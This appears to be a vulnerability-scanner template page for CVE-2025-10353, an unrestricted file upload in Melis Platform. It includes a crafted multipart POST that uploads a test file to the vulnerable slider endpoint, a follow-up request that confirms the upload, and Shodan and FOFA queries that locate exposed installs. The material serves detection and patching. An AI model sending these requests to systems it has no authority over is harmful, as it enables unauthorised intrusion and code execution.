Melis Technology Melis Platform - Unrestricted File Upload & Remote Code Execution
CVE-2025-10353
Verified
Description
Melis Technology Melis Platform contains an unrestricted file upload caused by insufficient validation of 'mcsdetail_img' parameter in /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm, letting attackers upload malicious files and achieve remote code execution, exploit requires crafted POST request.
Severity
Critical
CVSS Score
9.8
Exploit Probability
3%
Affected Product
melis-platform
Published Date
February 4, 2026
Template Author
ohmygod20260203
CVE-2025-10353.yaml
id: CVE-2025-10353
info:
name: Melis Technology Melis Platform - Unrestricted File Upload & Remote Code Execution
author: ohmygod20260203
severity: critical
description: |
Melis Technology Melis Platform contains an unrestricted file upload caused by insufficient validation of 'mcsdetail_img' parameter in /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm, letting attackers upload malicious files and achieve remote code execution, exploit requires crafted POST request.
impact: |
Attackers can upload malicious files leading to remote code execution and full system compromise.
remediation: |
Update to the latest version with the vulnerability fixed.
reference:
- https://github.com/ivansmc00/CVE-2025-10353-POC
- https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-melis-platform
- https://nvd.nist.gov/vuln/detail/CVE-2025-10353
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-10353
epss-score: 0.0254
epss-percentile: 0.83056
cwe-id: CWE-434
metadata:
verified: true
max-request: 2
shodan-query: http.html:"/melis/MelisCms"
fofa-query: body="/melis/MelisCms" || body="MelisDemoCms"
product: melis-platform
vendor: melis-technology
tags: cve,cve2025,melis,cms,file-upload,rce,intrusive,vkev
variables:
rand: "{{to_lower(rand_text_alpha(5))}}"
filename: "{{rand}}.txt"
payload: "CVE-2025-10353-{{rand}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----{{rand}}
------{{rand}}
Content-Disposition: form-data; name="mcsdetail_mcslider_id"
0
------{{rand}}
Content-Disposition: form-data; name="mcsdetail_img"; filename="{{filename}}"
Content-Type: text/plain
{{payload}}
------{{rand}}--
matchers:
- type: dsl
internal: true
dsl:
- 'status_code == 200'
- 'contains(body, "success") || contains(body, "uploaded")'
condition: and
- raw:
- |
GET /media/sliders/0/{{filename}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, payload)'
condition: and
extractors:
- type: dsl
dsl:
- 'host + "/media/sliders/0/" + filename'
# digest: 4a0a004730450221009e5d3b8cd74721de2c4feb66acb0113a2a7aa2ba84f684a6ccbd7a55accfc76502207bbd226d3d46aa8342cd1f7938606761181fe3fc8ed71678d11745934850b7d8:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2025-10353
CWE ID:
cwe-434
Remediation Steps
Update to the latest version with the vulnerability fixed.